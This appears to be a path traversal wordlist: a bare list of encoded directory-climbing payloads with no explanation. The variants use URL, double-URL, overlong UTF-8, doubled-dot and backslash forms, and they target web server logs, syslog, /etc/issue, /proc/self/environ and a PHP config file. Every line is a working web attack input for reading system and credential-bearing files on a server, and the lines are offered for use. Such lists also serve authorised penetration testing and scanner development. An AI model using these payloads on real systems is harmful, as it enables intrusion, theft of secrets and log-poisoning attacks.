%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/var/log/apache2/access.log
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\var\log\apache2\access.log
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache2/access.log
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\var\log\apache2\access.log
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fapache2%2faccess.log
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\var\log\apache2\access.log
..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66var%25%32%66log%25%32%66apache2%25%32%66access.log
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63var%25%35%63log%25%35%63apache2%25%35%63access.log
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/log/apache2/access.log
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\var\log\apache2\access.log
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fvar%252flog%252fapache2%252faccess.log
%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cvar%255clog%255capache2%255caccess.log
/var/log/apache2/error.log
../../../../../../../../../var/log/apache2/error.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Ferror.log
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afvar%c0%aflog%c0%afapache2%c0%aferror.log
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fvar%252flog%252fapache2%252ferror.log
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cvar%255clog%255capache2%255cerror.log
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9capache2%c1%9clog%c1%9cerror.log
..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fvar%252flog%252fapache2%252ferror.log
..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255cvar%252flog%255capache2%255cerror.log
....//....//....//....//....//....//....//....//var//log//apache2//error.log
....\\....\\....\\....\\....\\....\\....\\....\\var\\log\\apache2\\error.log
....%252f....%252f....%252f....%252f....%252f....%252f....%252fvar%252flog%252fapache2%252ferror.log
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/var/log/apache2/error.log
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\var\log\apache2\error.log
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache2/error.log
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\var\log\apache2\error.log
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fapache2%2ferror.log
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\var\log\apache2\error.log
..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66var%25%32%66log%25%32%66apache2%25%32%66error.log
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63var%25%35%63log%25%35%63apache2%25%35%63error.log
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/log/apache2/error.log
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\var\log\apache2\error.log
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fvar%252flog%252fapache2%252ferror.log
%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cvar%255clog%255capache2%255cerror.log
/var/log/nginx/access.log
../../../../../../../../../var/log/nginx/access.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fnginx%2Faccess.log
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afvar%c0%aflog%c0%afnginx%c0%afaccess.log
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fvar%252flog%252fnginx%252faccess.log
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cvar%255clog%255cnginx%255caccess.log
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cnginx%c1%9clog%c1%9caccess.log
..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fvar%252flog%252fnginx%252faccess.log
..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255cvar%252flog%255cnginx%255caccess.log
....//....//....//....//....//....//....//....//var//log//nginx//access.log
....\\....\\....\\....\\....\\....\\....\\....\\var\\log\\nginx\\access.log
....%252f....%252f....%252f....%252f....%252f....%252f....%252fvar%252flog%252fnginx%252faccess.log
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/var/log/nginx/access.log
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\var\log\nginx\access.log
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/nginx/access.log
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\var\log\nginx\access.log
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fnginx%2faccess.log
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\var\log\nginx\access.log
..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66var%25%32%66log%25%32%66nginx%25%32%66access.log
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63var%25%35%63log%25%35%63nginx%25%35%63access.log
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/log/nginx/access.log
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\var\log\nginx\access.log
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fvar%252flog%252fnginx%252faccess.log
%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cvar%255clog%255cnginx%255caccess.log
/var/log/nginx/error.log
../../../../../../../../../var/log/nginx/error.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fnginx%2Ferror.log
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afvar%c0%aflog%c0%afnginx%c0%aferror.log
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fvar%252flog%252fnginx%252ferror.log
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cvar%255clog%255cnginx%255cerror.log
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cnginx%c1%9clog%c1%9cerror.log
..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fvar%252flog%252fnginx%252ferror.log
..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255cvar%252flog%255cnginx%255cerror.log
....//....//....//....//....//....//....//....//var//log//nginx//error.log
....\\....\\....\\....\\....\\....\\....\\....\\var\\log\\nginx\\error.log
....%252f....%252f....%252f....%252f....%252f....%252f....%252fvar%252flog%252fnginx%252ferror.log
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/var/log/nginx/error.log
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\var\log\nginx\error.log
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/nginx/error.log
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\var\log\nginx\error.log
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fnginx%2ferror.log
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\var\log\nginx\error.log
..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66var%25%32%66log%25%32%66nginx%25%32%66error.log
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63var%25%35%63log%25%35%63nginx%25%35%63error.log
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/log/nginx/error.log
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\var\log\nginx\error.log
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fvar%252flog%252fnginx%252ferror.log
%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cvar%255clog%255cnginx%255cerror.log
/var/log/syslog
../../../../../../../../../var/log/syslog
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fsyslog
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afvar%c0%aflog%c0%afsyslog
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fvar%252flog%252fsyslog
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cvar%255clog%255csyslog
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9csyslog
..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fvar%252flog%252fsyslog
..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255cvar%252flog%255csyslog
....//....//....//....//....//....//....//....//var//log//syslog
....\\....\\....\\....\\....\\....\\....\\....\\var\\log\\syslog
....%252f....%252f....%252f....%252f....%252f....%252f....%252fvar%252flog%252fsyslog
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/var/log/syslog
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\var\log\syslog
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/syslog
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\var\log\syslog
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fsyslog
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\var\log\syslog
..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66var%25%32%66log%25%32%66syslog
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63var%25%35%63log%25%35%63syslog
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/log/syslog
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\var\log\syslog
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fvar%252flog%252fsyslog
%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cvar%255clog%255csyslog
/var/log/messages
../../../../../../../../../var/log/messages
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fmessages
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afvar%c0%aflog%c0%afmessages
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fvar%252flog%252fmessages
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cvar%255clog%255cmessages
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cmessages
..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fvar%252flog%252fmessages
..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255cvar%252flog%255cmessages
....//....//....//....//....//....//....//....//var//log//messages
....\\....\\....\\....\\....\\....\\....\\....\\var\\log\\messages
....%252f....%252f....%252f....%252f....%252f....%252f....%252fvar%252flog%252fmessages
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/var/log/messages
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\var\log\messages
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/messages
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\var\log\messages
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fmessages
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\var\log\messages
..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66var%25%32%66log%25%32%66messages
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63var%25%35%63log%25%35%63messages
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/log/messages
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\var\log\messages
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fvar%252flog%252fmessages
%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cvar%255clog%255cmessages
/etc/issue
../../../../../../../../../etc/issue
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fissue
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afissue
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fissue
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc%255cissue
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cissue
..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fetc%252fissue
..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255cetc%255cissue
....//....//....//....//....//....//....//....//etc//issue
....\\....\\....\\....\\....\\....\\....\\....\\etc\\issue
....%252f....%252f....%252f....%252f....%252f....%252f....%252fetc%252fissue
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/issue
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\issue
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/issue
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\etc\issue
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fissue
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\issue
..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66etc%25%32%66issue
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63etc%25%35%63issue
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/issue
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\issue
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fissue
%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cetc%255cissue
/proc/self/environ
../../../../../../../../../proc/self/environ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afproc%c0%afself%c0%afenviron
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fproc%252fself%252fenviron
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cproc%255cself%255cenviron
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cenviron
..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fproc%252fself%252fenviron
..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255cproc%255cself%255cenviron
....//....//....//....//....//....//....//....//proc//self//environ
....\\....\\....\\....\\....\\....\\....\\....\\proc\\self\\environ
....%252f....%252f....%252f....%252f....%252f....%252f....%252fproc%252fself%252fenviron
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/proc/self/environ
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\proc\self\environ
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/proc/self/environ
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\proc\self\environ
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\proc\self\environ
..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66proc%25%32%66self%25%32%66environ
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63proc%25%35%63self%25%35%63environ
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/proc/self/environ
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\proc\self\environ
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fproc%252fself%252fenviron
%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cproc%255cself%255cenviron
/var/www/html/config.php
../../../../../../../../../var/www/html/config.php
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fconfig.php
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afvar%c0%afwww%c0%afhtml%c0%afconfig.php
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fvar%252fwww%252fhtml%252fconfig.php
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cvar%255cwww%255chtml%255cconfig.php
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cconfig.php
..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fvar%252fwww%252fhtml%252fconfig.php
..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255cvar%252fwww%255chtml%255cconfig.php
....//....//....//....//....//....//....//....//var//www//html//config.php
....\\....\\....\\....\\....\\....\\....\\....\\var\\www\\html\\config.php
....%252f....%252f....%252f....%252f....%252f....%252f....%252fvar%252fwww%252fhtml%252fconfig.php
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/var/www/html/config.php
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\var\www\html\config.php
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/html/config.php
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\var\www\html\config.php
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2fwww%2fhtml%2fconfig.php
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\var\www\html\config.php
..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66var%25%32%66www%25%32%66html%25%32%66config.php
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63var%25%35%63www%25%35%63html%25%35%63config.php
